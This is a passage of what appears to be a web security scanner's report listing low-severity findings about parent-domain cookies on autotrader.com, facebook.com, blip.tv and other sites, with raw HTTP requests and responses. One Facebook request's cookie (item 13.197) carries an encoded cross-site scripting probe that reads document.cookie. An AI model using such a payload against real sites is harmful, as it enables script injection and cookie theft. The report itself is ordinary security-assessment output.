Set-Cookie: v1st=FD01CADD9CE8D858; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295885067871732; path=/; expires=Sat, 03-Jan-15 16:04:27 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerwww=2525552650.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

13.178. http://www.autotrader.com/research/used-cars/index.jsp/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/research/used-cars/index.jsp/x22

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

v1st=F1B5B0190A0903E5; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
ATC_ID=173.193.214.243.1295885064281746; path=/; expires=Sat, 03-Jan-15 16:04:24 GMT; domain=.autotrader.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /research/used-cars/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:24 GMT
Server: Apache
Set-Cookie: v1st=F1B5B0190A0903E5; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295885064281746; path=/; expires=Sat, 03-Jan-15 16:04:24 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerwww=1871241226.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

13.179. http://www.autotrader.com/x22/x3e/x3cli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/x22/x3e/x3cli

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

v1st=44290BD80D43DD62; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
ATC_ID=173.193.214.243.1295885061096866; path=/; expires=Sat, 03-Jan-15 16:04:21 GMT; domain=.autotrader.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /x22/x3e/x3cli HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:21 GMT
Server: Apache
Set-Cookie: v1st=44290BD80D43DD62; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295885061096866; path=/; expires=Sat, 03-Jan-15 16:04:21 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerwww=1351147530.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

13.180. http://www.autotraderclassics.com/find/index.xhtml/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotraderclassics.com
Path:	/find/index.xhtml/x22

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

v1st=AD90949C1AABB6BF; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotraderclassics.com
ATC_ID=216.66.31.240.1295885070163888; path=/; expires=Sat, 03-Jan-15 16:04:30 GMT; domain=.autotraderclassics.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /find/index.xhtml/x22 HTTP/1.1
Host: www.autotraderclassics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.181. http://www.autotraderclassics.com/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotraderclassics.com
Path:	/x22

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

v1st=38C713FCEE18F8B0; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotraderclassics.com
ATC_ID=216.66.31.238.1295885069167883; path=/; expires=Sat, 03-Jan-15 16:04:29 GMT; domain=.autotraderclassics.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /x22 HTTP/1.1
Host: www.autotraderclassics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.182. http://www.backtype.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.backtype.com
Path:	/search

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

BT=bb2426ba4c18241d1545e90dfa404f4a; expires=Wed, 23-Feb-2011 23:56:54 GMT; path=/; domain=.backtype.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search HTTP/1.1
Host: www.backtype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 24 Jan 2011 23:56:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: BT=bb2426ba4c18241d1545e90dfa404f4a; expires=Wed, 23-Feb-2011 23:56:54 GMT; path=/; domain=.backtype.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3713

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Sorry —
...[SNIP]...

13.183. http://www.blip.tv/about/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blip.tv
Path:	/about/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tab_state=about; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:12:59 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/ HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.184. http://www.blip.tv/blogs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blip.tv
Path:	/blogs/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tab_state=prefs; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:02 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/ HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.185. http://www.blip.tv/prefs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blip.tv
Path:	/prefs/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tab_state=prefs; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:19 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /prefs/ HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.186. http://www.care2.com/news/news_post.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.care2.com
Path:	/news/news_post.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

c2_user_state=38cf88fe52bbea1af5f9ce118bb02342%3A0; path=/; domain=.care2.com
c2_user_state=e009b77c4218ecc15ebbe840c71236b3%3A0; path=/; domain=.care2.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/news_post.html?url={u}&title={t} HTTP/1.1
Host: www.care2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 13:14:34 GMT
Server: Apache/2.2.8
Set-Cookie: c2_user_state=38cf88fe52bbea1af5f9ce118bb02342%3A0; path=/; domain=.care2.com
Set-Cookie: c2_user_state=e009b77c4218ecc15ebbe840c71236b3%3A0; path=/; domain=.care2.com
Location: http://www.care2.com/news/compose?sharehint=news&share[share_type]news&bookmarklet=Y&share[title]=%7Bt%7D&share[link_url]=%7Bu%7D&share[content]=
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html

13.187. http://www.elmundo.es/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.elmundo.es
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ELMUNDO_idusr=TT5aC8CoFBUAAB8okbI-c2f1049e2d4516c17b18641aef04f3d5; expires=Fri, 24 Jan 2014 05:05:15 GMT; path=/; domain=.elmundo.es

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.elmundo.es
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.188. http://www.employmentguide.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.employmentguide.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SITEMODE=desktop; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; domain=.employmentguide.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.employmentguide.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 23:59:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
IISExport: This web site was exported using IIS Export v4.2
Content-type: text/html
Page-Completion-Status: Normal
Expires: 01/24/11
Pragma: no-cache
cache-control: no-cache
Page-Completion-Status: Normal
Set-Cookie: L=Dallas%2C+TX; path=/;
Set-Cookie: SITEMODE=desktop; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; domain=.employmentguide.com;
Set-Cookie: BIGipServeremploymentguide_pool=889387786.20480.0000; expires=Tue, 25-Jan-2011 01:59:20 GMT; path=/

...[SNIP]...

13.189. http://www.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=fYoRD; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.190. http://www.facebook.com/%s previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/%s

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=NgpY2; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /%s HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

13.191. http://www.facebook.com/2008/fbml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/2008/fbml

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=2sxL4; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

13.192. http://www.facebook.com/7NEWS previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/7NEWS

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=aYRu9; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /7NEWS HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

13.193. http://www.facebook.com/LIMEprpromo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/LIMEprpromo

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=Tpmq1; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /LIMEprpromo HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=250x287; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

13.194. http://www.facebook.com/abid.bahloul previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/abid.bahloul

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=6G7wO; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fabid.bahloul; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fabid.bahloul; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /abid.bahloul HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=250x287; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

13.195. http://www.facebook.com/apps/application.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/apps/application.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=AGZLa; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /apps/application.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=AGZLa; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:12 GMT
Content-Length: 0

13.196. http://www.facebook.com/beirutcityguide previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/beirutcityguide

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=oJmQq; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /beirutcityguide HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=250x287; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

13.197. http://www.facebook.com/campaign/impression.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/campaign/impression.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS; expires=Wed, 23-Feb-2011 21:55:22 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/impression.php?campaign_id=137675572948107&partner_id=www1.whdh.com&placement=like_button&extra_1=http%3A%2F%2Fwww1.whdh.com%2Fnews%2Farticles%2Flocal%2F12003359267921%2Fcommuter-rail-service-updates-for-jan-24%2F&extra_2=US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?href=http://www1.whdh.com/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/&layout=standard&show-faces=true&width=450&action=recommend&colorscheme=light
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dla2day.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.la2day.com%252Fcustom%252Fterm%252Fhealth_beauty9c672%252522%25253E%25253Cimg%252520src%25253da%252520onerror%25253dalert%2528document.cookie%2529%25253Ebcac4069246%252F576%26extra_2%3DUS; wd=300x250

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 43
Content-Type: image/gif
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS; expires=Wed, 23-Feb-2011 21:55:22 GMT; path=/; domain=.facebook.com; httponly
X-Cnection: close
Date: Mon, 24 Jan 2011 21:55:22 GMT

GIF89a.............!.......,...........D..;

13.198. http://www.facebook.com/campaign/landing.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/campaign/landing.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

campaign_click_url=%2Fcampaign%2Flanding.php; expires=Thu, 24-Feb-2011 00:01:54 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/landing.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Thu, 24-Feb-2011 00:01:54 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:01:54 GMT
Content-Length: 0

13.199. http://www.facebook.com/home.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/home.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=isGBp; path=/; domain=.facebook.com
next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly
next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=250x287; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=isGBp; path=/; domain=.facebook.com
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 13:14:57 GMT
Content-Length: 0

13.200. http://www.facebook.com/miofeghali previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/miofeghali

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=eDdkX; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fmiofeghali; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmiofeghali; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /miofeghali HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

13.201. http://www.facebook.com/pages/Traverse-City-MI/CloudAccessnet/116931806748 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Traverse-City-MI/CloudAccessnet/116931806748

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=Q5Jew; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/Traverse-City-MI/CloudAccessnet/116931806748 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
